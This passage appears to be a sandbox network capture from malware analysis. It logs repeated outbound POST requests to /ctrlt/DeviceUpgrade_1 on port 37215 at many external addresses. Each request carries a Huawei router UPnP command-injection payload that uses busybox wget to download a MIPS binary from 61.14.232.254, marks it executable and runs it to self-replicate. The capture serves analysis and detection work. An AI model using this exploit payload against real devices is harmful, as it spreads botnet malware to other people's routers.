3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1782192.168.2.133689641.142.5.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630650043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1783192.168.2.135196041.38.145.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630671024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1784192.168.2.1334702157.164.20.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630758047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1785192.168.2.1351716157.52.24.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630812883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1786192.168.2.1341794134.143.220.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.630840063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1787192.168.2.133498641.224.218.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631191015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1788192.168.2.1338416197.190.94.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631212950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1789192.168.2.1359716197.213.187.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631278992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1790192.168.2.133397641.255.230.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631282091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1791192.168.2.1339920157.37.61.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631295919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1792192.168.2.1356184197.162.47.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.631393909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
